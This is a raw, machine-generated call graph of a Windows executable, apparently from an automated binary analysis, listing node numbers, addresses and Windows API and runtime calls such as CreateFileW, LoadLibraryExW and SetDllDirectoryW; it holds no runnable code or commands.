7ff7f250f648 _isindst LeaveCriticalSection 55744->55745 55746 7ff7f250524e 55745->55746 55746->55734 55746->55735 55758 7ff7f250eed8 55747->55758 55751 7ff7f250f236 55751->55738 55752->55725 55753->55730 55754->55730 55755->55730 55759 7ff7f250ef13 __vcrt_InitializeCriticalSectionEx 55758->55759 55760 7ff7f250f0da 55759->55760 55773 7ff7f2506d4c 51 API calls 3 library calls 55759->55773 55764 7ff7f250f0e3 55760->55764 55776 7ff7f25043f4 11 API calls _set_fmode 55760->55776 55762 7ff7f250f1b1 55777 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55762->55777 55764->55751 55770 7ff7f2516064 55764->55770 55766 7ff7f250f145 55766->55760 55774 7ff7f2506d4c 51 API calls 3 library calls 55766->55774 55768 7ff7f250f164 55768->55760 55775 7ff7f2506d4c 51 API calls 3 library calls 55768->55775 55778 7ff7f2515664 55770->55778 55773->55766 55774->55768 55775->55760 55776->55762 55777->55764 55779 7ff7f2515699 55778->55779 55780 7ff7f251567b 55778->55780 55779->55780 55782 7ff7f25156b5 55779->55782 55832 7ff7f25043f4 11 API calls _set_fmode 55780->55832 55789 7ff7f2515c74 55782->55789 55783 7ff7f2515680 55833 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55783->55833 55786 7ff7f251568c 55786->55751 55835 7ff7f25159a8 55789->55835 55792 7ff7f2515ce9 55866 7ff7f25043d4 11 API calls _set_fmode 55792->55866 55793 7ff7f2515d01 55854 7ff7f2507830 55793->55854 55797 7ff7f2515cee 55867 7ff7f25043f4 11 API calls _set_fmode 55797->55867 55825 7ff7f25156e0 55825->55786 55834 7ff7f2507808 LeaveCriticalSection 55825->55834 55832->55783 55833->55786 55836 7ff7f25159d4 55835->55836 55844 7ff7f25159ee 55835->55844 55836->55844 55879 7ff7f25043f4 11 API calls _set_fmode 55836->55879 55838 7ff7f25159e3 55880 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55838->55880 55840 7ff7f2515abd 55850 7ff7f2515b1a 55840->55850 55885 7ff7f2508e90 37 API calls 2 library calls 55840->55885 55841 7ff7f2515a6c 55841->55840 55883 7ff7f25043f4 11 API calls _set_fmode 55841->55883 55844->55841 55881 7ff7f25043f4 11 API calls _set_fmode 55844->55881 55845 7ff7f2515b16 55845->55850 55851 7ff7f2509c10 _isindst 17 API calls 55845->55851 55846 7ff7f2515ab2 55884 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55846->55884 55849 7ff7f2515a61 55882 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55849->55882 55850->55792 55850->55793 55853 7ff7f2515bad 55851->55853 55886 7ff7f250f5e8 EnterCriticalSection 55854->55886 55866->55797 55867->55825 55879->55838 55880->55844 55881->55849 55882->55841 55883->55846 55884->55840 55885->55845 55888 7ff7f24ff7ee 55887->55888 55889 7ff7f24ff7ae 55887->55889 55888->55889 55891 7ff7f24ff7fa 55888->55891 55899 7ff7f2509b24 37 API calls 2 library calls 55889->55899 55898 7ff7f250477c EnterCriticalSection 55891->55898 55892 7ff7f24ff7d5 55892->55686 55894 7ff7f24ff7ff 55895 7ff7f24ff908 71 API calls 55894->55895 55896 7ff7f24ff811 55895->55896 55897 7ff7f2504788 _fread_nolock LeaveCriticalSection 55896->55897 55897->55892 55899->55892 55901 7ff7f24ffe2c 55900->55901 55908 7ff7f24ffb4c 55901->55908 55903 7ff7f24ffe4a 55903->55703 55904->55692 55905->55699 55906->55699 55907->55699 55909 7ff7f24ffb6c 55908->55909 55914 7ff7f24ffb99 55908->55914 55910 7ff7f24ffb76 55909->55910 55911 7ff7f24ffba1 55909->55911 55909->55914 55922 7ff7f2509b24 37 API calls 2 library calls 55910->55922 55915 7ff7f24ffa8c 55911->55915 55914->55903 55923 7ff7f250477c EnterCriticalSection 55915->55923 55917 7ff7f24ffaa9 55918 7ff7f24ffacc 74 API calls 55917->55918 55919 7ff7f24ffab2 55918->55919 55920 7ff7f2504788 _fread_nolock LeaveCriticalSection 55919->55920 55921 7ff7f24ffabd 55920->55921 55921->55914 55922->55914 55925 7ff7f24ff163 55924->55925 55926 7ff7f24ff191 55924->55926 55935 7ff7f2509b24 37 API calls 2 library calls 55925->55935 55933 7ff7f24ff183 55926->55933 55934 7ff7f250477c EnterCriticalSection 55926->55934 55929 7ff7f24ff1a8 55930 7ff7f24ff1c4 72 API calls 55929->55930 55931 7ff7f24ff1b4 55930->55931 55932 7ff7f2504788 _fread_nolock LeaveCriticalSection 55931->55932 55932->55933 55933->55708 55935->55933 55937 7ff7f24ff706 55936->55937 55948 7ff7f24ff6d4 55936->55948 55938 7ff7f24ff715 memcpy_s 55937->55938 55939 7ff7f24ff752 55937->55939 55937->55948 55950 7ff7f25043f4 11 API calls _set_fmode 55938->55950 55949 7ff7f250477c EnterCriticalSection 55939->55949 55942 7ff7f24ff75a 55944 7ff7f24ff45c _fread_nolock 51 API calls 55942->55944 55943 7ff7f24ff72a 55951 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55943->55951 55946 7ff7f24ff771 55944->55946 55947 7ff7f2504788 _fread_nolock LeaveCriticalSection 55946->55947 55947->55948 55948->55657 55950->55943 55951->55948 55956 7ff7f2503cfe 55952->55956 55953 7ff7f2503d23 55970 7ff7f2509b24 37 API calls 2 library calls 55953->55970 55955 7ff7f2503d5f 55971 7ff7f2501f30 49 API calls _invalid_parameter_noinfo 55955->55971 55956->55953 55956->55955 55958 7ff7f2503d4d 55960 7ff7f24fb870 _log10_special 8 API calls 55958->55960 55959 7ff7f2503e3c 55961 7ff7f2509c58 __free_lconv_num 11 API calls 55959->55961 55962 7ff7f24f1c38 55960->55962 55961->55958 55962->55624 55963 7ff7f2503df6 55963->55959 55964 7ff7f2503e11 55963->55964 55965 7ff7f2503e60 55963->55965 55968 7ff7f2503e08 55963->55968 55972 7ff7f2509c58 55964->55972 55965->55959 55966 7ff7f2503e6a 55965->55966 55969 7ff7f2509c58 __free_lconv_num 11 API calls 55966->55969 55968->55959 55968->55964 55969->55958 55970->55958 55971->55963 55973 7ff7f2509c5d RtlFreeHeap 55972->55973 55974 7ff7f2509c8c 55972->55974 55973->55974 55975 7ff7f2509c78 GetLastError 55973->55975 55974->55958 55976 7ff7f2509c85 __free_lconv_num 55975->55976 55978 7ff7f25043f4 11 API calls _set_fmode 55976->55978 55978->55974 55979 7ff7f24fbf5c 56000 7ff7f24fc12c 55979->56000 55982 7ff7f24fc0a8 56119 7ff7f24fc44c 7 API calls 2 library calls 55982->56119 55983 7ff7f24fbf78 __scrt_acquire_startup_lock 55985 7ff7f24fc0b2 55983->55985 55990 7ff7f24fbf96 __scrt_release_startup_lock 55983->55990 56120 7ff7f24fc44c 7 API calls 2 library calls 55985->56120 55987 7ff7f24fbfbb 55988 7ff7f24fc0bd __FrameHandler3::FrameUnwindToEmptyState 55989 7ff7f24fc041 56006 7ff7f24fc594 55989->56006 55990->55987 55990->55989 56116 7ff7f2508e44 45 API calls 55990->56116 55992 7ff7f24fc046 56009 7ff7f24f1000 55992->56009 55997 7ff7f24fc069 55997->55988 56118 7ff7f24fc2b0 7 API calls 55997->56118 55999 7ff7f24fc080 55999->55987 56001 7ff7f24fc134 56000->56001 56002 7ff7f24fc140 __scrt_dllmain_crt_thread_attach 56001->56002 56003 7ff7f24fc14d 56002->56003 56005 7ff7f24fbf70 56002->56005 56003->56005 56121 7ff7f24fcba8 7 API calls 2 library calls 56003->56121 56005->55982 56005->55983 56122 7ff7f25197e0 56006->56122 56008 7ff7f24fc5ab GetStartupInfoW 56008->55992 56010 7ff7f24f1009 56009->56010 56124 7ff7f2504794 56010->56124 56012 7ff7f24f352b 56131 7ff7f24f33e0 56012->56131 56017 7ff7f24fb870 _log10_special 8 API calls 56020 7ff7f24f372a 56017->56020 56018 7ff7f24f3736 56022 7ff7f24f3f70 108 API calls 56018->56022 56019 7ff7f24f356c 56021 7ff7f24f1bf0 49 API calls 56019->56021 56117 7ff7f24fc5d8 GetModuleHandleW 56020->56117 56041 7ff7f24f3588 56021->56041 56023 7ff7f24f3746 56022->56023 56024 7ff7f24f3785 56023->56024 56221 7ff7f24f76a0 56023->56221 56230 7ff7f24f25f0 53 API calls _log10_special 56024->56230 56028 7ff7f24f3778 56031 7ff7f24f379f 56028->56031 56032 7ff7f24f377d 56028->56032 56029 7ff7f24f3538 56029->56017 56030 7ff7f24f365f __std_exception_destroy 56035 7ff7f24f3844 56030->56035 56038 7ff7f24f7e10 14 API calls 56030->56038 56034 7ff7f24f1bf0 49 API calls 56031->56034 56033 7ff7f24ff36c 74 API calls 56032->56033 56033->56024 56037 7ff7f24f37be 56034->56037 56234 7ff7f24f3e90 49 API calls 56035->56234 56048 7ff7f24f18f0 115 API calls 56037->56048 56039 7ff7f24f36ae 56038->56039 56219 7ff7f24f7f80 40 API calls __std_exception_destroy 56039->56219 56040 7ff7f24f3852 56043 7ff7f24f3865 56040->56043 56044 7ff7f24f3871 56040->56044 56193 7ff7f24f7e10 56041->56193 56235 7ff7f24f3fe0 56043->56235 56047 7ff7f24f1bf0 49 API calls 56044->56047 56045 7ff7f24f36bd 56049 7ff7f24f380f 56045->56049 56052 7ff7f24f36cf 56045->56052 56062 7ff7f24f3805 __std_exception_destroy 56047->56062 56050 7ff7f24f37df 56048->56050 56232 7ff7f24f8400 58 API calls _log10_special 56049->56232 56050->56041 56051 7ff7f24f37ef 56050->56051 56231 7ff7f24f25f0 53 API calls _log10_special 56051->56231 56056 7ff7f24f1bf0 49 API calls 56052->56056 56054 7ff7f24f86b0 2 API calls 56058 7ff7f24f389e SetDllDirectoryW 56054->56058 56059 7ff7f24f36f1 56056->56059 56057 7ff7f24f3814 56233 7ff7f24f7c40 84 API calls 2 library calls 56057->56233 56065 7ff7f24f38c3 56058->56065 56059->56062 56063 7ff7f24f36fc 56059->56063 56062->56054 56220 7ff7f24f25f0 53 API calls _log10_special 56063->56220 56069 7ff7f24f3a50 56065->56069 56238 7ff7f24f6560 53 API calls 56065->56238 56068 7ff7f24f3834 56068->56035 56068->56062 56071 7ff7f24f3a7d 56069->56071 56072 7ff7f24f3a5a PostMessageW GetMessageW 56069->56072 56070 7ff7f24f38d5 56239 7ff7f24f6b00 118 API calls 2 library calls 56070->56239 56206 7ff7f24f3080 56071->56206 56072->56071 56074 7ff7f24f38ea 56075 7ff7f24f3947 56074->56075 56078 7ff7f24f3901 56074->56078 56240 7ff7f24f65a0 121 API calls _log10_special 56074->56240 56075->56069 56083 7ff7f24f395c 56075->56083 56092 7ff7f24f3905 56078->56092 56241 7ff7f24f6970 91 API calls 56078->56241 56245 7ff7f24f30e0 122 API calls 2 library calls 56083->56245 56084 7ff7f24f3916 56084->56092 56242 7ff7f24f6cd0 54 API calls 56084->56242 56087 7ff7f24f3aa3 56088 7ff7f24f3964 56088->56029 56091 7ff7f24f396c 56088->56091 56246 7ff7f24f83e0 LocalFree 56091->56246 56092->56075 56243 7ff7f24f2870 53 API calls _log10_special 56092->56243 56093 7ff7f24f393f 56244 7ff7f24f6780 FreeLibrary 56093->56244 56116->55989 56117->55997 56118->55999 56119->55985 56120->55988 56121->56005 56123 7ff7f25197d0 56122->56123 56123->56008 56123->56123 56127 7ff7f250e790 56124->56127 56125 7ff7f250e7e3 56248 7ff7f2509b24 37 API calls 2 library calls 56125->56248 56127->56125 56128 7ff7f250e836 56127->56128 56249 7ff7f250e668 71 API calls _fread_nolock 56128->56249 56129 7ff7f250e80c 56129->56012 56250 7ff7f24fbb70 56131->56250 56134 7ff7f24f341b 56257 7ff7f24f29e0 51 API calls _log10_special 56134->56257 56135 7ff7f24f3438 56252 7ff7f24f85a0 FindFirstFileExW 56135->56252 56139 7ff7f24f34a5 56260 7ff7f24f8760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 56139->56260 56140 7ff7f24f344b 56258 7ff7f24f8620 CreateFileW GetFinalPathNameByHandleW CloseHandle 56140->56258 56142 7ff7f24fb870 _log10_special 8 API calls 56144 7ff7f24f34dd 56142->56144 56144->56029 56153 7ff7f24f18f0 56144->56153 56145 7ff7f24f3458 56148 7ff7f24f3474 __vcrt_InitializeCriticalSectionEx 56145->56148 56149 7ff7f24f345c 56145->56149 56146 7ff7f24f342e 56146->56142 56147 7ff7f24f34b3 56147->56146 56261 7ff7f24f26c0 49 API calls _log10_special 56147->56261 56148->56139 56259 7ff7f24f26c0 49 API calls _log10_special 56149->56259 56152 7ff7f24f346d 56152->56146 56154 7ff7f24f3f70 108 API calls 56153->56154 56155 7ff7f24f1925 56154->56155 56156 7ff7f24f1bb6 56155->56156 56158 7ff7f24f76a0 83 API calls 56155->56158 56157 7ff7f24fb870 _log10_special 8 API calls 56156->56157 56159 7ff7f24f1bd1 56157->56159 56160 7ff7f24f196b 56158->56160 56159->56018 56159->56019 56162 7ff7f24ff9f4 73 API calls 56160->56162 56192 7ff7f24f199c 56160->56192 56161 7ff7f24ff36c 74 API calls 56161->56156 56163 7ff7f24f1985 56162->56163 56164 7ff7f24f19a1 56163->56164 56165 7ff7f24f1989 56163->56165 56166 7ff7f24ff6bc _fread_nolock 53 API calls 56164->56166 56262 7ff7f24f2760 53 API calls 2 library calls 56165->56262 56168 7ff7f24f19b9 56166->56168 56169 7ff7f24f19bf 56168->56169 56170 7ff7f24f19d7 56168->56170 56263 7ff7f24f2760 53 API calls 2 library calls 56169->56263 56172 7ff7f24f1a06 56170->56172 56173 7ff7f24f19ee 56170->56173 56175 7ff7f24f1bf0 49 API calls 56172->56175 56264 7ff7f24f2760 53 API calls 2 library calls 56173->56264 56176 7ff7f24f1a1d 56175->56176 56177 7ff7f24f1bf0 49 API calls 56176->56177 56178 7ff7f24f1a68 56177->56178 56179 7ff7f24ff9f4 73 API calls 56178->56179 56180 7ff7f24f1a8c 56179->56180 56181 7ff7f24f1aa1 56180->56181 56182 7ff7f24f1ab9 56180->56182 56265 7ff7f24f2760 53 API calls 2 library calls 56181->56265 56184 7ff7f24ff6bc _fread_nolock 53 API calls 56182->56184 56185 7ff7f24f1ace 56184->56185 56186 7ff7f24f1ad4 56185->56186 56187 7ff7f24f1aec 56185->56187 56266 7ff7f24f2760 53 API calls 2 library calls 56186->56266 56267 7ff7f24ff430 37 API calls 2 library calls 56187->56267 56190 7ff7f24f1b06 56190->56192 56268 7ff7f24f25f0 53 API calls _log10_special 56190->56268 56192->56161 56194 7ff7f24f7e1a 56193->56194 56195 7ff7f24f86b0 2 API calls 56194->56195 56196 7ff7f24f7e39 GetEnvironmentVariableW 56195->56196 56197 7ff7f24f7e56 ExpandEnvironmentStringsW 56196->56197 56198 7ff7f24f7ea2 56196->56198 56197->56198 56199 7ff7f24f7e78 56197->56199 56200 7ff7f24fb870 _log10_special 8 API calls 56198->56200 56269 7ff7f24f8760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 56199->56269 56202 7ff7f24f7eb4 56200->56202 56202->56030 56203 7ff7f24f7e8a 56204 7ff7f24fb870 _log10_special 8 API calls 56203->56204 56205 7ff7f24f7e9a 56204->56205 56205->56030 56270 7ff7f24f5af0 56206->56270 56209 7ff7f24f30b9 56215 7ff7f24f33a0 56209->56215 56211 7ff7f24f30a1 56211->56209 56340 7ff7f24f5800 56211->56340 56213 7ff7f24f30ad 56213->56209 56349 7ff7f24f5990 53 API calls 56213->56349 56216 7ff7f24f33ae 56215->56216 56218 7ff7f24f33bf 56216->56218 56412 7ff7f24f8180 FreeLibrary 56216->56412 56247 7ff7f24f6780 FreeLibrary 56218->56247 56219->56045 56220->56029 56222 7ff7f24f76c4 56221->56222 56223 7ff7f24ff9f4 73 API calls 56222->56223 56225 7ff7f24f779b __std_exception_destroy 56222->56225 56224 7ff7f24f76e0 56223->56224 56224->56225 56413 7ff7f2506bd8 56224->56413 56225->56028 56227 7ff7f24ff9f4 73 API calls 56229 7ff7f24f76f5 56227->56229 56228 7ff7f24ff6bc _fread_nolock 53 API calls 56228->56229 56229->56225 56229->56227 56229->56228 56230->56029 56231->56029 56232->56057 56233->56068 56234->56040 56236 7ff7f24f1bf0 49 API calls 56235->56236 56237 7ff7f24f4010 56236->56237 56237->56062 56237->56237 56238->56070 56239->56074 56240->56078 56241->56084 56242->56092 56243->56093 56244->56075 56245->56088 56247->56087 56248->56129 56249->56129 56251 7ff7f24f33ec GetModuleFileNameW 56250->56251 56251->56134 56251->56135 56253 7ff7f24f85f2 56252->56253 56254 7ff7f24f85df FindClose 56252->56254 56255 7ff7f24fb870 _log10_special 8 API calls 56253->56255 56254->56253 56256 7ff7f24f3442 56255->56256 56256->56139 56256->56140 56257->56146 56258->56145 56259->56152 56260->56147 56261->56146 56262->56192 56263->56192 56264->56192 56265->56192 56266->56192 56267->56190 56268->56192 56269->56203 56271 7ff7f24f5b05 56270->56271 56272 7ff7f24f1bf0 49 API calls 56271->56272 56273 7ff7f24f5b41 56272->56273 56274 7ff7f24f5b6d 56273->56274 56275 7ff7f24f5b4a 56273->56275 56277 7ff7f24f3fe0 49 API calls 56274->56277 56360 7ff7f24f25f0 53 API calls _log10_special 56275->56360 56278 7ff7f24f5b85 56277->56278 56279 7ff7f24f5ba3 56278->56279 56361 7ff7f24f25f0 53 API calls _log10_special 56278->56361 56350 7ff7f24f3f10 56279->56350 56281 7ff7f24fb870 _log10_special 8 API calls 56284 7ff7f24f308e 56281->56284 56284->56209 56301 7ff7f24f5c80 56284->56301 56285 7ff7f24f5bbb 56287 7ff7f24f3fe0 49 API calls 56285->56287 56288 7ff7f24f5bd4 56287->56288 56289 7ff7f24f5bf9 56288->56289 56290 7ff7f24f5bd9 56288->56290 56292 7ff7f24f81a0 3 API calls 56289->56292 56362 7ff7f24f25f0 53 API calls _log10_special 56290->56362 56294 7ff7f24f5c06 56292->56294 56293 7ff7f24f5b63 56293->56281 56295 7ff7f24f5c12 56294->56295 56296 7ff7f24f5c49 56294->56296 56298 7ff7f24f86b0 2 API calls 56295->56298 56364 7ff7f24f50b0 95 API calls 56296->56364 56299 7ff7f24f5c2a 56298->56299 56363 7ff7f24f29e0 51 API calls _log10_special 56299->56363 56365 7ff7f24f4c80 56301->56365 56303 7ff7f24f5cba 56304 7ff7f24f5cd3 56303->56304 56305 7ff7f24f5cc2 56303->56305 56372 7ff7f24f4450 56304->56372 56397 7ff7f24f25f0 53 API calls _log10_special 56305->56397 56309 7ff7f24f5cdf 56398 7ff7f24f25f0 53 API calls _log10_special 56309->56398 56310 7ff7f24f5cf0 56313 7ff7f24f5cff 56310->56313 56314 7ff7f24f5d10 56310->56314 56312 7ff7f24f5cce 56312->56211 56399 7ff7f24f25f0 53 API calls _log10_special 56313->56399 56376 7ff7f24f4700 56314->56376 56317 7ff7f24f5d2b 56318 7ff7f24f5d2f 56317->56318 56319 7ff7f24f5d40 56317->56319 56400 7ff7f24f25f0 53 API calls _log10_special 56318->56400 56321 7ff7f24f5d4f 56319->56321 56322 7ff7f24f5d60 56319->56322 56401 7ff7f24f25f0 53 API calls _log10_special 56321->56401 56383 7ff7f24f45a0 56322->56383 56326 7ff7f24f5d6f 56402 7ff7f24f25f0 53 API calls _log10_special 56326->56402 56327 7ff7f24f5d80 56329 7ff7f24f5d8f 56327->56329 56330 7ff7f24f5da0 56327->56330 56403 7ff7f24f25f0 53 API calls _log10_special 56329->56403 56332 7ff7f24f5db1 56330->56332 56335 7ff7f24f5dc2 56330->56335 56404 7ff7f24f25f0 53 API calls _log10_special 56332->56404 56334 7ff7f24f5dec 56334->56312 56407 7ff7f24f25f0 53 API calls _log10_special 56334->56407 56335->56334 56405 7ff7f25065c0 73 API calls 56335->56405 56337 7ff7f24f5dda 56406 7ff7f25065c0 73 API calls 56337->56406 56341 7ff7f24f5820 56340->56341 56341->56341 56342 7ff7f24f5849 56341->56342 56345 7ff7f24f5860 __std_exception_destroy 56341->56345 56411 7ff7f24f25f0 53 API calls _log10_special 56342->56411 56344 7ff7f24f5855 56344->56213 56346 7ff7f24f1440 116 API calls 56345->56346 56347 7ff7f24f25f0 53 API calls 56345->56347 56348 7ff7f24f596b 56345->56348 56346->56345 56347->56345 56348->56213 56349->56209 56351 7ff7f24f3f1a 56350->56351 56352 7ff7f24f86b0 2 API calls 56351->56352 56353 7ff7f24f3f3f 56352->56353 56354 7ff7f24fb870 _log10_special 8 API calls 56353->56354 56355 7ff7f24f3f67 56354->56355 56355->56285 56356 7ff7f24f81a0 56355->56356 56357 7ff7f24f86b0 2 API calls 56356->56357 56358 7ff7f24f81b4 LoadLibraryExW 56357->56358 56359 7ff7f24f81d3 __std_exception_destroy 56358->56359 56359->56285 56360->56293 56361->56279 56362->56293 56363->56293 56364->56293 56367 7ff7f24f4cac 56365->56367 56366 7ff7f24f4cb4 56366->56303 56367->56366 56370 7ff7f24f4e54 56367->56370 56408 7ff7f2505db4 48 API calls 56367->56408 56368 7ff7f24f5017 __std_exception_destroy 56368->56303 56369 7ff7f24f4180 47 API calls 56369->56370 56370->56368 56370->56369 56373 7ff7f24f4480 56372->56373 56374 7ff7f24fb870 _log10_special 8 API calls 56373->56374 56375 7ff7f24f44ea 56374->56375 56375->56309 56375->56310 56377 7ff7f24f476f 56376->56377 56379 7ff7f24f471b 56376->56379 56410 7ff7f24f4300 MultiByteToWideChar MultiByteToWideChar __std_exception_destroy 56377->56410 56382 7ff7f24f475a 56379->56382 56409 7ff7f24f4300 MultiByteToWideChar MultiByteToWideChar __std_exception_destroy 56379->56409 56380 7ff7f24f477c 56380->56317 56382->56317 56384 7ff7f24f45b5 56383->56384 56385 7ff7f24f1bf0 49 API calls 56384->56385 56386 7ff7f24f4601 56385->56386 56387 7ff7f24f1bf0 49 API calls 56386->56387 56396 7ff7f24f4687 __std_exception_destroy 56386->56396 56388 7ff7f24f4640 56387->56388 56391 7ff7f24f86b0 2 API calls 56388->56391 56388->56396 56389 7ff7f24fb870 _log10_special 8 API calls 56390 7ff7f24f46dc 56389->56390 56390->56326 56390->56327 56392 7ff7f24f465a 56391->56392 56393 7ff7f24f86b0 2 API calls 56392->56393 56394 7ff7f24f4671 56393->56394 56395 7ff7f24f86b0 2 API calls 56394->56395 56395->56396 56396->56389 56397->56312 56398->56312 56399->56312 56400->56312 56401->56312 56402->56312 56403->56312 56404->56312 56405->56337 56406->56334 56407->56312 56408->56367 56409->56382 56410->56380 56411->56344 56412->56218 56414 7ff7f2506c08 56413->56414 56417 7ff7f25066e4 56414->56417 56416 7ff7f2506c21 56416->56229 56418 7ff7f25066ff 56417->56418 56419 7ff7f250672e 56417->56419 56428 7ff7f2509b24 37 API calls 2 library calls 56418->56428 56427 7ff7f250477c EnterCriticalSection 56419->56427 56422 7ff7f2506733 56424 7ff7f2506750 38 API calls 56422->56424 56423 7ff7f250671f 56423->56416 56425 7ff7f250673f 56424->56425 56426 7ff7f2504788 _fread_nolock LeaveCriticalSection 56425->56426 56426->56423 56428->56423 56429 7ffbbb896110 56430 7ffbbb896124 56429->56430 56431 7ffbbb896138 56429->56431 56433 7ffbbb896161 56430->56433 56442 7ffbbb89626c 56430->56442 56482 7ffbbb8ca4a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 56431->56482 56434 7ffbbb89616a 56433->56434 56435 7ffbbb896211 56433->56435 56437 7ffbbb8961e9 56434->56437 56438 7ffbbb89616f GetLastError 56434->56438 56475 7ffbbb8976f0 56435->56475 56436 7ffbbb8961d5 56437->56436 56444 7ffbbb8961f9 56437->56444 56440 7ffbbb896186 56438->56440 56441 7ffbbb89618b 56438->56441 56483 7ffbbb893a40 6 API calls _handle_error 56440->56483 56451 7ffbbb896197 56441->56451 56486 7ffbbb8962cc 6 API calls _handle_error 56441->56486 56442->56436 56503 7ffbbb8977ec 117 API calls 56442->56503 56485 7ffbbb893a40 6 API calls _handle_error 56444->56485 56447 7ffbbb896223 56449 7ffbbb8962b7 SetLastError 56447->56449 56487 7ffbbb88dcf0 56447->56487 56449->56436 56450 7ffbbb8961fe 56450->56436 56506 7ffbbb8962cc 6 API calls _handle_error 56450->56506 56451->56449 56453 7ffbbb8961a1 56451->56453 56453->56449 56456 7ffbbb8961aa 56453->56456 56484 7ffbbb893a40 6 API calls _handle_error 56456->56484 56458 7ffbbb896248 56500 7ffbbb8962cc 6 API calls _handle_error 56458->56500 56459 7ffbbb8962a9 56504 7ffbbb8962cc 6 API calls _handle_error 56459->56504 56460 7ffbbb8d33ef 56507 7ffbbb89f930 29 API calls __std_type_info_destroy_list 56460->56507 56461 7ffbbb8961b5 SetLastError 56461->56436 56465 7ffbbb8961d0 56461->56465 56465->56436 56466 7ffbbb8962b0 56505 7ffbbb88f040 25 API calls 2 library calls 56466->56505 56467 7ffbbb896250 56468 7ffbbb8d3408 56467->56468 56469 7ffbbb896258 56467->56469 56508 7ffbbb8962cc 6 API calls _handle_error 56468->56508 56501 7ffbbb8963a4 25 API calls memmove_s 56469->56501 56473 7ffbbb896260 56502 7ffbbb88f040 25 API calls 2 library calls 56473->56502 56509 7ffbbb8c967c 56475->56509 56477 7ffbbb89773d 56480 7ffbbb897746 56477->56480 56525 7ffbbb8c96bc 8 API calls 3 library calls 56477->56525 56478 7ffbbb897704 56478->56477 56517 7ffbbb89c7f0 EnterCriticalSection 56478->56517 56480->56436 56482->56430 56483->56441 56484->56461 56485->56450 56486->56447 56488 7ffbbb88dd16 HeapAlloc 56487->56488 56489 7ffbbb88dd01 56487->56489 56491 7ffbbb88dd47 56488->56491 56492 7ffbbb8d0f80 56488->56492 56489->56488 56490 7ffbbb8d0f6e 56489->56490 56579 7ffbbb893440 25 API calls 2 library calls 56490->56579 56491->56458 56491->56459 56495 7ffbbb8d0fb9 56492->56495 56499 7ffbbb8d0f9f HeapAlloc 56492->56499 56580 7ffbbb883964 8 API calls _handle_error 56492->56580 56581 7ffbbb8ec860 10 API calls memmove_s 56492->56581 56582 7ffbbb893440 25 API calls 2 library calls 56495->56582 56498 7ffbbb8d0fc3 56499->56492 56499->56495 56500->56467 56501->56473 56502->56451 56503->56436 56504->56466 56505->56449 56506->56460 56507->56465 56508->56466 56510 7ffbbb8c9685 __vcrt_initialize_winapi_thunks 56509->56510 56526 7ffbbb8c9c98 56510->56526 56513 7ffbbb8c9698 56513->56478 56515 7ffbbb8c96a1 56515->56513 56533 7ffbbb8c9d04 DeleteCriticalSection 56515->56533 56550 7ffbbb89c998 56517->56550 56519 7ffbbb89c80c 56520 7ffbbb89c81c LeaveCriticalSection 56519->56520 56561 7ffbbb89c93c 79 API calls 56519->56561 56520->56478 56522 7ffbbb89c815 56562 7ffbbb89c838 GetStdHandle GetFileType 56522->56562 56524 7ffbbb89c81a 56524->56520 56525->56477 56527 7ffbbb8c9ca0 56526->56527 56529 7ffbbb8c9cd1 56527->56529 56531 7ffbbb8c9694 56527->56531 56534 7ffbbb8ca0a0 56527->56534 56539 7ffbbb8c9d04 DeleteCriticalSection 56529->56539 56531->56513 56532 7ffbbb8c9854 8 API calls 2 library calls 56531->56532 56532->56515 56533->56513 56540 7ffbbb8c9d88 56534->56540 56537 7ffbbb8ca0e0 56537->56527 56538 7ffbbb8ca0eb InitializeCriticalSectionAndSpinCount 56538->56537 56539->56531 56541 7ffbbb8c9de9 56540->56541 56548 7ffbbb8c9de4 try_get_function 56540->56548 56541->56537 56541->56538 56542 7ffbbb8c9ecc 56542->56541 56545 7ffbbb8c9eda GetProcAddress 56542->56545 56543 7ffbbb8c9e18 LoadLibraryExW 56544 7ffbbb8c9e39 GetLastError 56543->56544 56543->56548 56544->56548 56546 7ffbbb8c9eeb 56545->56546 56546->56541 56547 7ffbbb8c9eb1 FreeLibrary 56547->56548 56548->56541 56548->56542 56548->56543 56548->56547 56549 7ffbbb8c9e73 LoadLibraryExW 56548->56549 56549->56548 56551 7ffbbb8d5b28 56550->56551 56552 7ffbbb89c9bb EnterCriticalSection 56550->56552 56575 7ffbbb893440 25 API calls 2 library calls 56551->56575 56555 7ffbbb89c9d3 56552->56555 56554 7ffbbb8d5b2d 56576 7ffbbb8a2370 73 API calls memmove_s 56554->56576 56556 7ffbbb89ca12 LeaveCriticalSection 56555->56556 56560 7ffbbb89ca0d 56555->56560 56563 7ffbbb89ca40 56555->56563 56556->56519 56558 7ffbbb8d5b39 56560->56556 56561->56522 56562->56524 56564 7ffbbb88dcf0 memmove_s 25 API calls 56563->56564 56569 7ffbbb89ca54 56564->56569 56565 7ffbbb89cb24 56577 7ffbbb88f040 25 API calls 2 library calls 56565->56577 56567 7ffbbb89cb42 56567->56555 56568 7ffbbb8d5b83 InitializeCriticalSectionAndSpinCount 56570 7ffbbb8d5b98 GetProcAddress 56568->56570 56569->56565 56569->56568 56573 7ffbbb8d5b40 56569->56573 56572 7ffbbb8d5b5c 56570->56572 56572->56568 56574 7ffbbb8d5bdb 56572->56574 56573->56570 56573->56572 56578 7ffbbb89bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 56573->56578 56574->56574 56575->56554 56576->56558 56577->56567 56578->56573 56579->56491 56580->56492 56581->56492 56582->56498 56583 7ff7f2504938 56584 7ff7f2504952 56583->56584 56585 7ff7f250496f 56583->56585 56634 7ff7f25043d4 11 API calls _set_fmode 56584->56634 56585->56584 56586 7ff7f2504982 CreateFileW 56585->56586 56588 7ff7f25049b6 56586->56588 56589 7ff7f25049ec 56586->56589 56608 7ff7f2504a8c GetFileType 56588->56608 56637 7ff7f2504f14 46 API calls 3 library calls 56589->56637 56590 7ff7f2504957 56635 7ff7f25043f4 11 API calls _set_fmode 56590->56635 56595 7ff7f25049f1 56600 7ff7f25049f5 56595->56600 56601 7ff7f2504a20 56595->56601 56596 7ff7f250495f 56636 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 56596->56636 56598 7ff7f25049e1 CloseHandle 56603 